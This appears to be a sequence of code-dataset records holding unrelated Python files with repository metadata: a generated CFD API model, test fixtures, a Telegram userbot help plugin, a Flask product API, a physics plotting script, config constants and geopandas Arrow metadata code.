:param gauge_pressure: The gauge_pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCGaugePressure
"""
self._gauge_pressure = gauge_pressure
@property
def gauge_pressure_rgh(self):
"""Gets the gauge_pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The gauge_pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCGaugePressureRgh
"""
return self._gauge_pressure_rgh
@gauge_pressure_rgh.setter
def gauge_pressure_rgh(self, gauge_pressure_rgh):
"""Sets the gauge_pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions.
:param gauge_pressure_rgh: The gauge_pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCGaugePressureRgh
"""
self._gauge_pressure_rgh = gauge_pressure_rgh
@property
def turbulent_kinetic_energy(self):
"""Gets the turbulent_kinetic_energy of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The turbulent_kinetic_energy of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCTurbulentKineticEnergy
"""
return self._turbulent_kinetic_energy
@turbulent_kinetic_energy.setter
def turbulent_kinetic_energy(self, turbulent_kinetic_energy):
"""Sets the turbulent_kinetic_energy of this OneOfConvectiveHeatTransferBoundaryConditions.
:param turbulent_kinetic_energy: The turbulent_kinetic_energy of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCTurbulentKineticEnergy
"""
self._turbulent_kinetic_energy = turbulent_kinetic_energy
@property
def omega_dissipation_rate(self):
"""Gets the omega_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The omega_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCOmegaDissipationRate
"""
return self._omega_dissipation_rate
@omega_dissipation_rate.setter
def omega_dissipation_rate(self, omega_dissipation_rate):
"""Sets the omega_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions.
:param omega_dissipation_rate: The omega_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCOmegaDissipationRate
"""
self._omega_dissipation_rate = omega_dissipation_rate
@property
def epsilon_dissipation_rate(self):
"""Gets the epsilon_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The epsilon_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCEpsilonDissipationRate
"""
return self._epsilon_dissipation_rate
@epsilon_dissipation_rate.setter
def epsilon_dissipation_rate(self, epsilon_dissipation_rate):
"""Sets the epsilon_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions.
:param epsilon_dissipation_rate: The epsilon_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCEpsilonDissipationRate
"""
self._epsilon_dissipation_rate = epsilon_dissipation_rate
@property
def eddy_viscosity(self):
"""Gets the eddy_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The eddy_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCEddyViscosity
"""
return self._eddy_viscosity
@eddy_viscosity.setter
def eddy_viscosity(self, eddy_viscosity):
"""Sets the eddy_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions.
:param eddy_viscosity: The eddy_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCEddyViscosity
"""
self._eddy_viscosity = eddy_viscosity
@property
def eddy_viscosity_compressible(self):
"""Gets the eddy_viscosity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The eddy_viscosity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCEddyViscosityCompressible
"""
return self._eddy_viscosity_compressible
@eddy_viscosity_compressible.setter
def eddy_viscosity_compressible(self, eddy_viscosity_compressible):
"""Sets the eddy_viscosity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions.
:param eddy_viscosity_compressible: The eddy_viscosity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCEddyViscosityCompressible
"""
self._eddy_viscosity_compressible = eddy_viscosity_compressible
@property
def nu_tilda(self):
"""Gets the nu_tilda of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The nu_tilda of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCNuTilda
"""
return self._nu_tilda
@nu_tilda.setter
def nu_tilda(self, nu_tilda):
"""Sets the nu_tilda of this OneOfConvectiveHeatTransferBoundaryConditions.
:param nu_tilda: The nu_tilda of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCNuTilda
"""
self._nu_tilda = nu_tilda
@property
def turbulent_thermal_diffusivity(self):
"""Gets the turbulent_thermal_diffusivity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The turbulent_thermal_diffusivity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCTurbulentThermalDiffusivity
"""
return self._turbulent_thermal_diffusivity
@turbulent_thermal_diffusivity.setter
def turbulent_thermal_diffusivity(self, turbulent_thermal_diffusivity):
"""Sets the turbulent_thermal_diffusivity of this OneOfConvectiveHeatTransferBoundaryConditions.
:param turbulent_thermal_diffusivity: The turbulent_thermal_diffusivity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCTurbulentThermalDiffusivity
"""
self._turbulent_thermal_diffusivity = turbulent_thermal_diffusivity
@property
def turbulent_thermal_diffusivity_compressible(self):
"""Gets the turbulent_thermal_diffusivity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The turbulent_thermal_diffusivity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCTurbulentThermalDiffusivityCompressible
"""
return self._turbulent_thermal_diffusivity_compressible
@turbulent_thermal_diffusivity_compressible.setter
def turbulent_thermal_diffusivity_compressible(self, turbulent_thermal_diffusivity_compressible):
"""Sets the turbulent_thermal_diffusivity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions.
:param turbulent_thermal_diffusivity_compressible: The turbulent_thermal_diffusivity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCTurbulentThermalDiffusivityCompressible
"""
self._turbulent_thermal_diffusivity_compressible = turbulent_thermal_diffusivity_compressible
@property
def turbulent_dynamic_viscosity(self):
"""Gets the turbulent_dynamic_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The turbulent_dynamic_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCTurbulentDynamicViscosity
"""
return self._turbulent_dynamic_viscosity
@turbulent_dynamic_viscosity.setter
def turbulent_dynamic_viscosity(self, turbulent_dynamic_viscosity):
"""Sets the turbulent_dynamic_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions.
:param turbulent_dynamic_viscosity: The turbulent_dynamic_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCTurbulentDynamicViscosity
"""
self._turbulent_dynamic_viscosity = turbulent_dynamic_viscosity
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_key = self.attribute_map[self.discriminator]
discriminator_value = data[discriminator_key]
return self.discriminator_value_class_map.get(discriminator_value)
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OneOfConvectiveHeatTransferBoundaryConditions):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, OneOfConvectiveHeatTransferBoundaryConditions):
return True
return self.to_dict() != other.to_dict()
| 40.695418 | 693 | 0.722811 |
b2df8f08997aff9e5af9a781eb6dfdc38b377096 | 441 | py | Python | tests/remotes/local.py | sahilbhosale63/dvc | 999c9e188801f971b75f51ca84f5bad533cb462c | [
"Apache-2.0"
] | null | null | null | tests/remotes/local.py | sahilbhosale63/dvc | 999c9e188801f971b75f51ca84f5bad533cb462c | [
"Apache-2.0"
] | null | null | null | tests/remotes/local.py | sahilbhosale63/dvc | 999c9e188801f971b75f51ca84f5bad533cb462c | [
"Apache-2.0"
] | null | null | null | import pytest
from tests.basic_env import TestDvc
from .base import Base
class Local(Base):
@staticmethod
def get_storagepath():
return TestDvc.mkdtemp()
@staticmethod
def get_url():
return Local.get_storagepath()
@pytest.fixture
def local_cloud():
yield Local()
@pytest.fixture
def local_remote(tmp_dir, dvc, local_cloud):
tmp_dir.add_remote(config=local_cloud.config)
yield local_cloud
| 16.333333 | 49 | 0.714286 |
5a47c6982cb27e8cfc468e2c702c4c85a85deb3a | 2,870 | py | Python | userbot/plugins/_helper.py | kwkwkkw/ironbot | 1b7e6def5f3a6af030317b9405ebda7db711fcee | [
"MIT"
] | 1 | 2020-09-16T09:55:12.000Z | 2020-09-16T09:55:12.000Z | userbot/plugins/_helper.py | kwkwkkw/ironbot | 1b7e6def5f3a6af030317b9405ebda7db711fcee | [
"MIT"
] | null | null | null | userbot/plugins/_helper.py | kwkwkkw/ironbot | 1b7e6def5f3a6af030317b9405ebda7db711fcee | [
"MIT"
] | 1 | 2021-07-06T13:44:41.000Z | 2021-07-06T13:44:41.000Z | from userbot import CMD_LIST
from userbot.utils import admin_cmd
import sys
from telethon import events, functions, __version__
@command(pattern="^.help ?(.*)")
#@borg.on(admin_cmd(pattern=r"help ?(.*)"))
async def cmd_list(event):
if not event.text[0].isalpha() and event.text[0] not in ("/", "#", "@", "!"):
tgbotusername = Var.TG_BOT_USER_NAME_BF_HER
input_str = event.pattern_match.group(1)
if tgbotusername is None or input_str == "text":
string = ""
for i in CMD_LIST:
string += "😎 " + i + "\n"
for iter_list in CMD_LIST[i]:
string += "Ironbot`" + str(iter_list) + "`"
string += "\n"
string += "\n"
if len(string) > 9999:
with io.BytesIO(str.encode(string)) as out_file:
out_file.name = "cmd.txt"
await bot.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption="**COMMANDS**",
reply_to=reply_to_id
)
await event.delete()
else:
await event.edit(string)
elif input_str:
if input_str in CMD_LIST:
string = "Commands found in {}:".format(input_str)
for i in CMD_LIST[input_str]:
string += " " + i
string += "\n"
await event.edit(string)
else:
await event.edit(input_str + " is not a valid plugin!")
else:
help_string = """Userbot Mod Ironbot..\n`.help / .help <module name> untuk melihat command`"""
results = await bot.inline_query( # pylint:disable=E0602
tgbotusername,
help_string
)
await results[0].click(
event.chat_id,
reply_to=event.reply_to_msg_id,
hide_via=True
)
await event.delete()
@borg.on(admin_cmd(pattern="syntax (.*)"))
async def _(event):
if event.fwd_from:
return
plugin_name = event.pattern_match.group(1)
if plugin_name in borg._plugins:
help_string = borg._plugins[plugin_name].__doc__
unload_string = f"Use `.unload {plugin_name}` to remove this plugin.\n"
if help_string:
plugin_syntax = f"Syntax for plugin **{plugin_name}**:\n\n{help_string}\n{unload_string}"
else:
plugin_syntax = f"No DOCSTRING has been setup for {plugin_name} plugin."
else:
plugin_syntax = "Enter valid **Plugin** name.\nDo `.exec ls stdplugins` or `.helpme` to get list of valid plugin names."
await event.edit(plugin_syntax)
| 40.422535 | 128 | 0.523693 |
143ac595c4f7d1f2c5715f0e156253266c333cad | 2,078 | py | Python | app.py | coffescript/api-rest-flask | 3e844f8a13706b6d23a4def36147d3f26ce1981b | [
"MIT"
] | 1 | 2019-11-18T07:51:54.000Z | 2019-11-18T07:51:54.000Z | app.py | coffescript/api-rest-flask | 3e844f8a13706b6d23a4def36147d3f26ce1981b | [
"MIT"
] | null | null | null | app.py | coffescript/api-rest-flask | 3e844f8a13706b6d23a4def36147d3f26ce1981b | [
"MIT"
] | null | null | null | #flask
from flask import Flask, jsonify, request
app = Flask(__name__)
from products import Products
@app.route('/ping')
def ping():
return jsonify({'message': 'pong!'})
@app.route('/products', methods=['GET'])
def getProducts():
return jsonify({"products": Products, "message": "Products list"})
@app.route('/products/<string:product_name>')
def getProduct(product_name):
productsFound = [product for product in Products if product['name'] == product_name]
if (len(productsFound) > 0):
return jsonify({"product": productsFound[0]})
return jsonify({"message": "Product not found.:("})
@app.route('/products', methods=['POST'])
def addProduct():
new_product = {
"name": request.json['name'],
"price": request.json['price'],
"quantity": request.json['quantity']
}
Products.append(new_product)
return jsonify({"message": "Product Added Successfully", "products": Products})
@app.route('/products/<string:product_name>', methods=['PUT'])
def editProduct(product_name):
productsFound = [product for product in Products if product['name'] == product_name]
if (len(productsFound) > 0):
productsFound[0]['name'] = request.json['name']
productsFound[0]['price'] = request.json['price']
productsFound[0]['quantity'] = request.json['quantity']
return jsonify({
"message": "Product Updated Successfully",
"product_updated": productsFound[0],
"products": Products
})
return jsonify({
"message": "Product not Found. :("
})
@app.route('/products/<string:product_name>', methods=['DELETE'])
def deleteProduct(product_name):
productsFound = [product for product in Products if product['name'] == product_name]
if(len(productsFound) > 0):
Products.remove(productsFound[0])
return jsonify({
"message": "Product Deleted. :(",
"products": Products
})
return jsonify({"message": "Product not found. :("})
if __name__ == '__main__':
app.run(debug=True, port=4000)
| 32.984127 | 88 | 0.639557 |
32b5360b83fa5a09241c3e328d4a55678f74f6b0 | 5,125 | py | Python | sims-2/dg-maxwell/s5/plot-sol.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | 1 | 2019-12-19T16:21:13.000Z | 2019-12-19T16:21:13.000Z | sims-2/dg-maxwell/s5/plot-sol.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | null | null | null | sims-2/dg-maxwell/s5/plot-sol.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | 2 | 2020-01-08T06:23:33.000Z | 2020-01-08T07:06:50.000Z | import pylab
import tables
import math
import numpy
import pylab
import numpy
from matplotlib import rcParams
import matplotlib.pyplot as plt
# customization for figure
rcParams['lines.linewidth'] = 2
rcParams['font.size'] = 18
#rcParams['xtick.major.size'] = 8 # default is 4
#rcParams['xtick.major.width'] = 3 # default is 0.5
#rcParams['ytick.major.size'] = 8 # default is 4
#rcParams['ytick.major.width'] = 3 # default is 0.5
rcParams['figure.facecolor'] = 'white'
#rcParams['figure.subplot.bottom'] = 0.125
#rcParams['figure.subplot.right'] = 0.85 # keep labels/ticks of colobar in figure
rcParams['image.interpolation'] = 'none'
rcParams['image.origin'] = 'lower'
rcParams['contour.negative_linestyle'] = 'solid'
#rcParams['savefig.bbox'] = 'tight'
# Math/LaTex fonts:
# http://matplotlib.org/users/mathtext.html
# http://matplotlib.org/users/usetex.html
# Example: xlabel(r'$t \cdot l / V_{A,bc}$')
rcParams['mathtext.default'] = 'regular' # match the font used for regular text
def getRaw(q, component, numEqns, nNodes):
rawData = numpy.zeros((q.shape[0], q.shape[1], nNodes), numpy.float)
for n in range(nNodes):
rawData[:,:,n] = q[:,:,component+n*numEqns]
return rawData
def evalSum(coeff, fields):
res = 0.0*fields[0]
for i in range(len(coeff)):
res = res + coeff[i]*fields[i]
return res
def projectOnFinerGrid_f(Xc, Yc, q):
dx = Xc[1]-Xc[0]
dy = Yc[1]-Yc[0]
nx = Xc.shape[0]
ny = Yc.shape[0]
# mesh coordinates
Xn = pylab.linspace(Xc[0]-0.5*dx, Xc[-1]+0.5*dx, 3*nx+1) # one more
Yn = pylab.linspace(Yc[0]-0.5*dy, Yc[-1]+0.5*dy, 3*ny+1) # one more
XXn, YYn = pylab.meshgrid(Xn, Yn)
# data
qn = pylab.zeros((3*Xc.shape[0], 3*Yc.shape[0]), float)
v1 = q[:,:,0]
v2 = q[:,:,1]
v3 = q[:,:,2]
v4 = q[:,:,3]
v5 = q[:,:,4]
v6 = q[:,:,5]
v7 = q[:,:,6]
v8 = q[:,:,7]
vList = [v1,v2,v3,v4,v5,v6,v7,v8]
# node 1
c1 = [.2314814814814815,-.1388888888888889,-.06481481481481481,-.1388888888888889,0.462962962962963,.09259259259259259,.09259259259259259,0.462962962962963]
qn[0:3*nx:3, 0:3*ny:3] = evalSum(c1, vList)
# node 2
c2 = [-.1388888888888889,-.1388888888888889,-.1388888888888889,-.1388888888888889,.8333333333333334,.2777777777777778,.1666666666666667,.2777777777777778]
qn[1:3*nx:3, 0:3*ny:3] = evalSum(c2, vList)
# node 3
c3 = [-.1388888888888889,.2314814814814815,-.1388888888888889,-.06481481481481481,0.462962962962963,0.462962962962963,.09259259259259259,.09259259259259259]
qn[2:3*nx:3, 0:3*ny:3] = evalSum(c3, vList)
# node 4
c4 = [-.1388888888888889,-.1388888888888889,-.1388888888888889,-.1388888888888889,.2777777777777778,.1666666666666667,.2777777777777778,.8333333333333334]
qn[0:3*nx:3, 1:3*ny:3] = evalSum(c4, vList)
# node 5
c5 = [-0.25,-0.25,-0.25,-0.25,0.5,0.5,0.5,0.5]
qn[1:3*nx:3, 1:3*ny:3] = evalSum(c5, vList)
# node 6
c6 = [-.1388888888888889,-.1388888888888889,-.1388888888888889,-.1388888888888889,.2777777777777778,.8333333333333334,.2777777777777778,.1666666666666667]
qn[2:3*nx:3, 1:3*ny:3] = evalSum(c6, vList)
# node 7
c7 = [-.1388888888888889,-.06481481481481481,-.1388888888888889,.2314814814814815,.09259259259259259,.09259259259259259,0.462962962962963,0.462962962962963]
qn[0:3*nx:3, 2:3*ny:3] = evalSum(c7, vList)
# node 8
c8 = [-.1388888888888889,-.1388888888888889,-.1388888888888889,-.1388888888888889,.1666666666666667,.2777777777777778,.8333333333333334,.2777777777777778]
qn[1:3*nx:3, 2:3*ny:3] = evalSum(c8, vList)
# node 9
c9 = [-.06481481481481481,-.1388888888888889,.2314814814814815,-.1388888888888889,.09259259259259259,0.462962962962963,0.462962962962963,.09259259259259259]
qn[2:3*nx:3, 2:3*ny:3] = evalSum(c9, vList)
return XXn, YYn, qn
fh = tables.openFile("s5-dg-maxwell_q_1.h5")
grid = fh.root.StructGrid
lower = grid._v_attrs.vsLowerBounds
upper = grid._v_attrs.vsUpperBounds
cells = grid._v_attrs.vsNumCells
dx = (upper[0]-lower[0])/cells[0]
dy = (upper[1]-lower[1])/cells[1]
Xc = pylab.linspace(lower[0]+0.5*dx, upper[0]-0.5*dx, cells[0])
Yc = pylab.linspace(lower[1]+0.5*dy, upper[1]-0.5*dy, cells[1])
# get final solution
q1 = getRaw(fh.root.StructGridField, 2, 8, 8)
Xn, Yn, qn_1 = projectOnFinerGrid_f(Xc, Yc, q1)
# get intial solution
fh = tables.openFile("s5-dg-maxwell_q_0.h5")
q0 = getRaw(fh.root.StructGridField, 2, 8, 8)
Xn, Yn, qn_0 = projectOnFinerGrid_f(Xc, Yc, q0)
nx, ny = Xn.shape[0], Yn.shape[0]
# make plot
pylab.figure(1)
pylab.pcolormesh(Xn, Yn, pylab.transpose(qn_1))
pylab.axis('tight')
pylab.savefig('s5-dg-maxwell-Ez.png')
def calcAverage(fld):
d13 = 1.0/3.0
d43 = 4.0/3.0
wt = pylab.array([-d13, -d13, -d13, -d13, d43, d43, d43, d43])
return (fld[:,:,0:8]*wt).sum(axis=-1)
# compute error
q0avg = calcAverage(q0)
q1avg = calcAverage(q1)
vol = dx*dy/4.0
errAvg = vol*numpy.abs(q1avg-q0avg).sum()
print dx, errAvg
pylab.show()
| 33.940397 | 160 | 0.654244 |
5eb09a749fd8fe8df7170e95b9dd852cb5ae5854 | 225 | py | Python | mattslib/__init__.py | greenmachine1902/NEAT | 5bfab1e38ccebb6d40ef46c5ea2f7f482b5c6be8 | [
"BSD-3-Clause"
] | null | null | null | mattslib/__init__.py | greenmachine1902/NEAT | 5bfab1e38ccebb6d40ef46c5ea2f7f482b5c6be8 | [
"BSD-3-Clause"
] | null | null | null | mattslib/__init__.py | greenmachine1902/NEAT | 5bfab1e38ccebb6d40ef46c5ea2f7f482b5c6be8 | [
"BSD-3-Clause"
] | null | null | null | from .list import condense, findMaxMin
from . import dict
from . import file
from . import math_util
from . import pygame
__all__ = ['dict', 'file', 'list', 'math_util', 'condense', 'findMaxMin']
__version__ = '1.2'
| 25 | 74 | 0.684444 |
f9342bd4a0dff29830985194be9cb0f0ba672e9e | 807 | py | Python | src/Canonical/constants.py | mwjjeong/SpliceAI-test | 4050038e3c3863ba3d58b311d895ef48b7be7af6 | [
"Zlib"
] | null | null | null | src/Canonical/constants.py | mwjjeong/SpliceAI-test | 4050038e3c3863ba3d58b311d895ef48b7be7af6 | [
"Zlib"
] | null | null | null | src/Canonical/constants.py | mwjjeong/SpliceAI-test | 4050038e3c3863ba3d58b311d895ef48b7be7af6 | [
"Zlib"
] | 2 | 2020-05-20T03:48:07.000Z | 2021-12-18T22:01:17.000Z | CL_max=10000
# Maximum nucleotide context length (CL_max/2 on either side of the
# position of interest)
# CL_max should be an even number
SL=5000
# Sequence length of SpliceAIs (SL+CL will be the input length and
# SL will be the output length)
# directory settings
PROJECT_DIR='/extdata4/baeklab/minwoo/projects/SpliceAI-test'
DATA_DIR='/extdata4/baeklab/minwoo/projects/SpliceAI-test/data'
RESULT_DIR='/extdata4/baeklab/minwoo/projects/SpliceAI-test/results'
MODEL_DIR='/extdata4/baeklab/minwoo/projects/SpliceAI-test/spliceai/models'
# data path settings
REF_GENOME='/extdata6/Minwoo/data/ref-genome/hg19/hg19.fa'
SPLICE_TABLE='/extdata4/baeklab/minwoo/projects/SpliceAI-test/data/gencode_merge_dataset.txt'
SEQUENCE='/extdata4/baeklab/minwoo/projects/SpliceAI-test/data/gencode_merge_sequence.txt'
| 40.35 | 93 | 0.812887 |
ec5dcd396e1d3a07df7eb9fac6f34938d7bece5a | 3,659 | py | Python | tests/test_filesystem.py | robtucker/pyspark-tooling | 946773975b4069c448dca1590eff3ae77a25be98 | [
"MIT"
] | null | null | null | tests/test_filesystem.py | robtucker/pyspark-tooling | 946773975b4069c448dca1590eff3ae77a25be98 | [
"MIT"
] | null | null | null | tests/test_filesystem.py | robtucker/pyspark-tooling | 946773975b4069c448dca1590eff3ae77a25be98 | [
"MIT"
] | null | null | null | import os
import uuid
import pandas as pd
from zipfile import ZipFile
from pyspark_tooling.filesystem import EmrFilesystem
from tests import base
CSV_DATA = """
foo,bar
a,1
b,2
c,3
"""
YAML_DATA = """
foo:
- a: 1
- b: 2
"""
SQL_DATA = """
SELECT *
FROM my_table
WHERE my_condition IS NOT NULL
"""
class TestFilesystem(base.BaseTest):
"""Test loading data from emr"""
def test_load_local_yaml(self):
filepath = f"./data/{str(uuid.uuid4())}/local.yaml"
self.put_local(filepath, YAML_DATA)
fs = EmrFilesystem(None, is_local=True)
actual = fs.open(filepath)
expected = {"foo": [{"a": 1}, {"b": 2}]}
assert actual == expected
self.wipe_folder("./data")
def test_load_local_csv(self):
filepath = f"./data/{str(uuid.uuid4())}/local.csv"
self.put_local(filepath, CSV_DATA)
fs = EmrFilesystem(None, is_local=True)
actual = fs.open(filepath)
tuples = [tuple(x) for x in actual.to_numpy()]
expected = [("a", 1), ("b", 2), ("c", 3)]
assert tuples == expected
self.wipe_folder("./data")
def test_load_local_txt(self):
filepath = f"./data/{str(uuid.uuid4())}/local.txt"
data = str(uuid.uuid4())
self.put_local(filepath, data)
fs = EmrFilesystem(None, is_local=True)
actual = fs.open(filepath)
assert actual == data
self.wipe_folder("./data")
def test_load_zip_csv(self):
bucket = "./data"
filename = "random.csv"
actual = self.run_zip_test(bucket, filename, CSV_DATA)
assert isinstance(actual, pd.core.frame.DataFrame)
tuples = [tuple(x) for x in actual.to_numpy()]
expected = [("a", 1), ("b", 2), ("c", 3)]
assert tuples == expected
def test_load_zip_yaml(self):
bucket = "./data"
filename = "random.yaml"
actual = self.run_zip_test(bucket, filename, YAML_DATA)
assert isinstance(actual, dict)
expected = {"foo": [{"a": 1}, {"b": 2}]}
assert actual == expected
def test_load_zip_sql(self):
bucket = "./data"
filename = "random.sql"
actual = self.run_zip_test(bucket, filename, SQL_DATA)
assert isinstance(actual, str)
assert actual == SQL_DATA
def test_load_zip_txt(self):
bucket = "./data"
filename = "random.txt"
data = f"{str(uuid.uuid4())}\n{str(uuid.uuid4())}"
actual = self.run_zip_test(bucket, filename, data)
assert isinstance(actual, str)
assert actual == data
def run_zip_test(self, bucket, filename: str, data):
zip_folder = f"zip_test/{str(uuid.uuid4())}"
zip_directory = os.path.join(bucket, zip_folder)
filepath = f"{str(uuid.uuid4())}/{filename}"
_, ext = os.path.splitext(filepath)
local_filepath = os.path.join(zip_folder, filepath)
zip_filepath = os.path.join(zip_directory, "result.zip")
self.put_local(os.path.join(bucket, local_filepath), data)
z = ZipFile(zip_filepath, mode="w")
z.write(os.path.join(bucket, local_filepath), arcname=filepath)
z.close()
fs = EmrFilesystem(zipped_code_path=zip_filepath, is_local=False)
actual = fs.open(filepath)
self.wipe_folder(bucket)
return actual
def put_local(self, filepath: str, data):
"""Save a file locally"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
"""Save a json file locally"""
with open(filepath, "w") as f:
f.write(data)
| 26.514493 | 73 | 0.600437 |
f04000af79bd5b56d7a115679cb95b264c253ec9 | 1,057 | py | Python | ote_sdk/ote_sdk/usecases/evaluation/performance_provider_interface.py | vyashina/training_extensions | e7aa33af94a1f8004d3ea2df259d99234dfca046 | [
"Apache-2.0"
] | null | null | null | ote_sdk/ote_sdk/usecases/evaluation/performance_provider_interface.py | vyashina/training_extensions | e7aa33af94a1f8004d3ea2df259d99234dfca046 | [
"Apache-2.0"
] | null | null | null | ote_sdk/ote_sdk/usecases/evaluation/performance_provider_interface.py | vyashina/training_extensions | e7aa33af94a1f8004d3ea2df259d99234dfca046 | [
"Apache-2.0"
] | null | null | null | """ This module contains interface for performance providers. """
# INTEL CONFIDENTIAL
#
# Copyright (C) 2021 Intel Corporation
#
# This software and the related documents are Intel copyrighted materials, and
# your use of them is governed by the express license under which they were provided to
# you ("License"). Unless the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the related documents
# without Intel's prior written permission.
#
# This software and the related documents are provided as is,
# with no express or implied warranties, other than those that are expressly stated
# in the License.
import abc
from ote_sdk.entities.metrics import Performance
class IPerformanceProvider(metaclass=abc.ABCMeta):
"""
Interface for performance provider.
TODO: subject for refactoring.
"""
@abc.abstractmethod
def get_performance(self) -> Performance:
"""
Returns the computed performance
"""
raise NotImplementedError
| 30.2 | 88 | 0.741722 |
2421211bee3d36f0d538abfb5dd8e805e5c70e60 | 16,243 | py | Python | geopandas/io/arrow.py | ameier3/geopandas | 0435306e74c71b870c06ea4e26dc4d4ee85ea9d9 | [
"BSD-3-Clause"
] | 1 | 2022-01-29T11:04:05.000Z | 2022-01-29T11:04:05.000Z | geopandas/io/arrow.py | ameier3/geopandas | 0435306e74c71b870c06ea4e26dc4d4ee85ea9d9 | [
"BSD-3-Clause"
] | null | null | null | geopandas/io/arrow.py | ameier3/geopandas | 0435306e74c71b870c06ea4e26dc4d4ee85ea9d9 | [
"BSD-3-Clause"
] | null | null | null | from packaging.version import Version
import json
import warnings
from pandas import DataFrame
from geopandas._compat import import_optional_dependency
from geopandas.array import from_wkb
from geopandas import GeoDataFrame
import geopandas
from .file import _expand_user
METADATA_VERSION = "0.1.0"
# reference: https://github.com/geopandas/geo-arrow-spec
# Metadata structure:
# {
# "geo": {
# "columns": {
# "<name>": {
# "crs": "<WKT or None: REQUIRED>",
# "encoding": "WKB"
# }
# },
# "creator": {
# "library": "geopandas",
# "version": "<geopandas.__version__>"
# }
# "primary_column": "<str: REQUIRED>",
# "schema_version": "<METADATA_VERSION>"
# }
# }
def _is_fsspec_url(url):
return (
isinstance(url, str)
and "://" in url
and not url.startswith(("http://", "https://"))
)
def _create_metadata(df):
"""Create and encode geo metadata dict.
Parameters
----------
df : GeoDataFrame
Returns
-------
dict
"""
# Construct metadata for each geometry
column_metadata = {}
for col in df.columns[df.dtypes == "geometry"]:
series = df[col]
column_metadata[col] = {
"crs": series.crs.to_wkt() if series.crs else None,
"encoding": "WKB",
"bbox": series.total_bounds.tolist(),
}
return {
"primary_column": df._geometry_column_name,
"columns": column_metadata,
"schema_version": METADATA_VERSION,
"creator": {"library": "geopandas", "version": geopandas.__version__},
}
def _encode_metadata(metadata):
"""Encode metadata dict to UTF-8 JSON string
Parameters
----------
metadata : dict
Returns
-------
UTF-8 encoded JSON string
"""
return json.dumps(metadata).encode("utf-8")
def _decode_metadata(metadata_str):
"""Decode a UTF-8 encoded JSON string to dict
Parameters
----------
metadata_str : string (UTF-8 encoded)
Returns
-------
dict
"""
if metadata_str is None:
return None
